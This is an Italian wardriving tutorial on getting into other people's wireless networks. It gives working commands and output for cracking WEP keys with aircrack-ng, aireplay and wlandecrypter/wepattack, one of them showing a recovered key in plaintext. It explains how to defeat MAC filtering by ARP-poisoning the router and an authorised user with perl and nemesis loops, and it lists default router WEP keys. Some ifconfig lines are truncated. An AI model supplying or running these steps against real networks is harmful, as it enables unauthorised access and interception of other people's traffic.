Chi è un Wardriver?

  • Wardriver è quell'uomo che se ne va ingiro, portatile alla mano a cercare connessioni wireless e ne traccia una mappa. Non importa l'uso che ne fa, se ci navigherà sarà un wardriver buono se attaccherà, decripterà o ingannerà la rete trovata, sarà + un hacker che un wardriver.
  • Io consiglio di utilizzare un pc con linux e una scheda 802.11x con chip Atheros (madwifi). Solitamente D-Link Xtreme.

Scroccare internet

  • una volta configurata la scheda, come ath0 (o eth1 eth7, wlan0 ecc. dipende dalla scheda e dalla distrib.)

siamo pronti per dare un'occhiata e wardriverare.

  • diciamo alla scheda di agganciarsi a qualsiasi rete, qualsiasi canale.
iwconfig ath0 essid any channel 0
  • scanniamo l'aria...
iwlist ath0 scanning

appariranno tutte le reti disponibili, ora bisogna scegliere la rete

  • Prendiamo come esempio la rete wireless
iwconfig ath0 essid wireless
  • se siamo connessi alla rete, vedremo il BSSID dell'acces point.
iwconfig ath0
ifconfig ath0 up
  • la rete adesso è su , ma manca il livello IP, le opzioni sono 2
    • chiedere un ip all'accespoint
dhclient ath0
  • oppure scegliere delle reti a caso, partenda dalla + probabile:
ifconfig ath0
  • oppure
ifconfig ath0
  • oppure
ifconfig ath0
  • oppure
ifconfig ath0
  • oppure
ifconfig ath0
  • una volta trovata la rete proviamo a fare u nping al router/access point
    • se ci ponga al ping, siamo connessi ed è probabile che riusciremo anche a navigare
    • se non pinga, i motivi possono essere un numero molto alto
  1. Il router ha un firewall che blocca il ping
  2. il router ha impostata la sicurezza a livello MAC, una lista di schede di rete accettabili, e il blocco di tutte le schede non conosciute --> vedi + in basso:
  3. il router ha una WEP/WPA, password di protezione.
  4. mentre facevamo il comando di ping, il router si è misteriosamente spento, oppure si è persa la connessione per qualche fattore ambientale, hanno chiuso una finestra (di quelle vere) o qualcuno si è messo tra noi e l'antenna.
  5. non abbiamo azzeccato l'ip del router (di solito è il .1 di una rete, di solito..)
  6. la scheda non funziona
  7. la spina è attaccata?
  8. ecc..

Trovare reti all'infinito

  • se hai un'antenna con cavo e vuoi provare a muoverla per migliorare la ricezione, il comando watch fa comodo.
iwconfig ath0 essid any
watch 'iwlist ath0 scanning |grep -2 Channel'

Niente Paura della WEP


WLAN_39-1.cap è il file dove ho catturato i pacchetti
aircrack-ng -a1 -eWLAN_39 -b00:60:B3:FD:70:57 -m00:0E:35:07:38:B7 -s WLAN_39-1.cap

aircrack-ng -a 1 -m 00:16:0A:06:8B:B3 -b 00:16:0A:06:2A:9C -e "Sweex LW050" -s dump-w-1-ch-6-02.cap

                                                       Aircrack-ng 1.0

                                       [00:00:17] Tested 13626 keys (got 904240 IVs)
  KB    depth   byte(vote)
   0    0/  1   6E(1259008) F8(943360) 0A(937216) 99(935936) 89(935680) A0(934400) 38(932608) 78(932608) 73(930816)
   1    0/  1   69(1231616) 61(944640) 06(941824) C4(941312) 42(940544) 95(935936) 21(935424) E3(933632) 32(932352)
   2    0/  1   63(1238016) E6(945920) E7(944640) 4E(936192) D9(932608) 27(932352) 3E(932096) 93(931072) EE(931072)
   3    0/  1   6F(1248256) 63(938496) 6A(936704) 4D(936448) 92(934400) 60(932352) 25(931584) 6B(929792) E8(927488)
   4    0/  1   31(1227264) B4(947200) DF(943616) 7C(938752) 7B(934656) 30(931328) D9(929792) E5(929536) 0B(928256)
   5    0/  1   33(1232896) 7C(950528) 50(946688) 36(941824) E2(941568) 3F(938240) 89(937472) C1(933632) 68(933376)
   6    0/  1   35(1192192) 72(946944) FD(944128) CA(939776) 6B(938240) 81(935936) 97(933632) 4B(933376) 6D(932608)
   7    0/  1   38(1197824) EA(941312) C7(938240) 2A(935424) B4(934400) 85(932864) 79(930048) 4F(929536) F1(928512)
   8    0/  1   32(1180672) 43(946432) DF(940544) 2B(935680) 4D(934912) 1C(934144) 7A(933888) FB(933376) 98(931840)
   9    0/  1   33(1200128) A0(950016) 39(939520) C9(939264) B4(937984) 59(934912) 66(933376) 0A(932608) EE(932608)
  10    0/  1   7A(961024) 35(941824) 8F(941312) 06(938752) A7(935424) 23(934656) 08(933632) C3(933632) 24(933376)
  11    3/  1   AF(938496) 82(935936) 9C(934912) B1(934400) 11(932864) 1D(932608) 1B(931840) FC(931840) 40(930304)
  12    0/  1   34(1059824) 15(947576) 63(937100) EF(931872) 7D(930464) CE(929532) EC(928572) 9E(927728) D8(927612)
    KEY FOUND! [ 6E:69:63:6F:31:33:35:38:32:33:35:38:34 ] (ASCII: nico135823584 )
       Decrypted correctly: 100%



Generare traffico

  • con aireplay si fa così:
aireplay ath0 -3 -b 00:11:95:9D:74:1C -h 00:90:96:65:E5:47 -a 00:11:95:9D:74:1C -e ADSL-WIRELESS
  • Nel frattempo catturiamo con airodump:
airodump ath0 WLAN_11-1 6

L'output + o meno sarà:

 BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID
 00:11:95:9D:74:1C   10     8595           101469   6  54  WEP  ADSL-WIRELESS
 BSSID              STATION            PWR   Packets  ESSID
 00:11:95:9D:74:1C  00:90:96:65:E5:47   -2     56435  ADSL-WIRELESS

AccessPoints WLAN_XX

  • Ho ricevuto un router dalla mia compagnia telefonica con una wep impostata, ma ho perso il foglietto con la chiave... la troverò usando un programma chiamato wlandecrypter usato assieme a wepattack. Servirà anche airodump.
  • vediamo che canale, che essid e che bssid (AP MAC) ha:
iwlist ath0 scan
  • Catturo i pacchetti: (airodump "interfaccia_wifi" "output_file" "channel")
airodump ath0 WLAN_12 6
  • aspetto fino a che non cominciano ad entrare pacchetti di dati ("Data"), poi quando cominciano a essere almeno una decina o un centinaio, premo Control-C per interrompere.
  • adesso passo il file .cap che ha generato airodump e lo passo a wepcrack(airodump genera 2 file, un .cap con i pacchetti e un .txt con le informazioni sugli host e gli AP) wlandecrypter bssid essid | wepattack -f output_name.cap
wlandecrypter 00:60:B3:XX:70:XX WLAN_12 | wepattack -f WLAN_12.cap 
  • L'output sarà + o meno questo:
wlandecrypter 0.4 - (c) 2006 nilp0inter2k6_at_gmail.com
------------>  http://www.rusoblanco.com  <------------
 [+] BSSID: 00:60:B3:77:77:77
 [+] Modelo: Z-com
 [+] ESSID: WLAN_39
 [+] Seleccionada salida estandar

Extraction of necessary data was successfull!

Founded BSSID:
1)  00 60 B3 FD 70 77 / Key 0
1 network loaded...

Accepting wordlist data...

key no. 10000: Z001349270F39
key no. 20000: Z0013494E1F39
key no. 30000: Z001349752F39

++++++++++ Packet decrypted! ++++++++++  
BSSID: 00 60 B3 44 44 44 / Key 0        WepKey: 5A 30 30 31 33 34 39 37 42 30 32 33 39 (Z0013497B0239) 
Encryption: 128 Bit 

time: 11.580097 sec     words: 31492

Access Points SpeedTouccXXXXX / ThomsonXXXX

The default password is generated by an algorithm so, with a simple "while" you can get the password from the mac address and the ESSID , there is a software to do that or a website.


Filtraggio di MAC

  • Questo sistema di protezione ha senso ma non troppo perché l'indirizzo univoco della scheda wifi può essere falsificato, per esempio si potrebbe copiare quello che usa l'utente della rete e farsi scambiare per amico dall'accespoint. Ecco come si fa:
    • è necessario avere perl
    • è necessario il programma nemesis
    • anche uno sniffer serve, come tcpdump o meglio (+ visuale) ethereal e ethereal-gnome come interfaccia.
    • sarà molto utile la tabella a pié di pagina, sulle password di fabbrica dei router e/o access points.
    • immaginazione.

Trovare un indirizzo mac autorizzato:

  1. connettiamoci alla rete, anche se non riceviamo e non possiamo inviare pacchetti, basta che la scheda sia associata all'acces point (si vede il BSSID da iwconfig che è tipo un xx:xx:xx:xx:xx:xx....)
  2. apriamo il nostro sniffer, e cominciamo ad annotarci tutti gli indirizzi MAC che vediamo. Escludiamo quello della nostra scheda,
tcpdump -i ath0 -n -e -q ether host 00:01:38:4D:83:E9
  • questo comando comincerà a stampare linee tate quanti pacchetti passano per l'interfaccia ath0 e che abbiano il mac address del mittente o ricevente = a "00:01:38:4d:83:e9"
14:49:26.143433 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 60: > tcp 0
14:49:26.296083 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 379: > tcp 313
14:49:26.296126 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, IPv4, length 66: > tcp 0
  • vediamo che 00:01:38:4d:83:e9 comunica con 00:13:8f:a3:0c:07, quindi se questo non è il MAC della nostra scheda, possiamo prendelo come documento falso da usare con il router, con nemesis:
    • MAC mia scheda 00:01:29:25:27:0e
    • MAC router 00:01:38:4d:83:e9 -> IP
    • MAC utente autorizzato router: 00:13:8f:a3:0c:07 -> IP
  • ora bisogna creare un triango, ossia far credere al router che l'utente siamo noi e contemporaneamente all'utente che il router siamo noi. Questo è possibile generando un pacchetto che dica: 'sono il router e ho questo MAC(il nostro)' all'utente e 'sono l'utente e ho questo MAC(il nostro)' al router.
  • parliamo con il router:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S -D \
-h 00:01:29:25:27:0e -m 00:0B:6A:76:97:AF \
-H 00:00:61:74:68:30 -M 00:0B:6A:76:97:AF \
"); sleep 10; }'
  • parliamo con l'utente:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S -D \
-h 00:01:29:25:27:0e -m 00:13:8f:a3:0c:07 \
-H 00:01:29:25:27:0e -M 00:01:38:4d:83:e9 \
"); sleep 10; }'
  • Questi comandi loopperanno all'infinito, vanno eseguiti in 2 terminali diversi oppure appiccicarli in una chiamata unica di perl, e il risultato sarà che tutto il traffico tra router e utente passerà per la nostra scheda. Così facendo possiamo preovare ad entrare nel router e aggiungere il nostro mac alla lista di "amici".

Defaults WEP Keys


  • Netgear
Default WEP KEY1: 11 11 11 11 11
Default WEP KEY2: 20 21 22 23 24
Default WEP KEY3: 30 31 32 33 34
Default WEP KEY4: 40 41 42 43 44


  • Zyxel
64-bit WEP with 5 characters
Key1= 2e3f4
Key2= 5y7js
Key3= 24fg7
Key4= 98jui

  • 64-bit WEP with 10 hexadecimal digits
('0-9', 'A-F')
Key1= 0x123456789A
Key2= 0x23456789AB
Key3= 0x3456789ABC
Key4= 0x456789ABCD

  • 128-bit WEP with 13 characters
Key1= 2e3f4w345ytre
Key2= 5y7jse8r4i038
Key3= 24fg70okx3fr7
Key4= 98jui2wss35u4

  • 128-bit WEP with 26 hexadecimal digits
('0-9', 'A-F')
Key1= 0x112233445566778899AABBCDEF
Key2= 0x2233445566778899AABBCCDDEE
Key3= 0x3344556677889900AABBCCDDFF
Key4= 0x44556677889900AABBCCDDEEFF 

Power, dBm and mW

thanks to [1]

Rule 1: The Rule of 3 If you raise the dBm value by “3″ you double the mW value:

0dBm = 1mW 3dBm = 2mW 6dBm = 4mW 9dBm = 8mW 12dBm = 16mW 15dBm = 32mW 18dBm = 64mW 21dBm = 128mW 24dBm = 256mW 27dBm = 512mW 30dBm = 1024mW (5GHz Band B legal limit) 33dBm = 2048mW 36dBm = 4096mW (5GHz Band C legal limit)

This also mean that if you lower the dBm value by “3″ you halve the mW value

Rule 2: The Rule of 10 If you raise the dBm value by “10″ you multiply the mW value by 10:

0dBm = 1mW 10dBm = 10mW 20dBm = 100mW 30dBm = 1000mW (5GHz Band B legal limit) 40dBm = 10000mW (Over the 5GHz Band C legal limit)

Yup you guessed it, if you lower the dBm value by 10 you divide the mW value by 10.

The above calculations aren’t exact, but they are typically accurate enough to get by on.

Spero siano utili a qualcuno


